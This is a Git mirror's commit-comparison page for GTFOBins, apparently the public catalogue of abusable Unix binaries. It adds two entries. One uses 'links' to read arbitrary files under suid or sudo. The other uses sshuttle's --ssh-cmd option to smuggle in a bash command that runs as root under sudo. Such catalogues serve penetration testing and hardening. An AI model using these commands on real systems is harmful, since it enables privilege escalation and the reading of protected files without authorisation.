1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-12 10:36:04 +02:00

Compare commits

...

3 Commits

Author SHA1 Message Date
Diego Tellaroli 4fa68b3457
Merge 11c69d5497 into 97f46f1526 2024-04-24 13:27:17 +08:00
Juampa Rodríguez 97f46f1526
Create links
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2024-04-10 22:46:01 +02:00
Diego Tellaroli 11c69d5497
Create sshuttle.md 2023-12-21 21:52:14 -03:00
2 changed files with 23 additions and 0 deletions

16
_gtfobins/links.md Normal file
View File

@ -0,0 +1,16 @@
---
description: The result is displayed in a TUI interface.
functions:
file-read:
- code: |
LFILE=file_to_read
links "$LFILE"
suid:
- code: |
LFILE=file_to_read
./links "$LFILE"
sudo:
- code: |
LFILE=file_to_read
sudo links "$LFILE"
---

7
_gtfobins/sshuttle.md Normal file
View File

@ -0,0 +1,7 @@
---
functions:
sudo:
- description: If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. The output of the executed command is in /tmp/root_id
code: |
sudo sshuttle -r root@anything --ssh-cmd "/bin/bash -c 'id>/tmp/root_id'" 192.168.3.3
---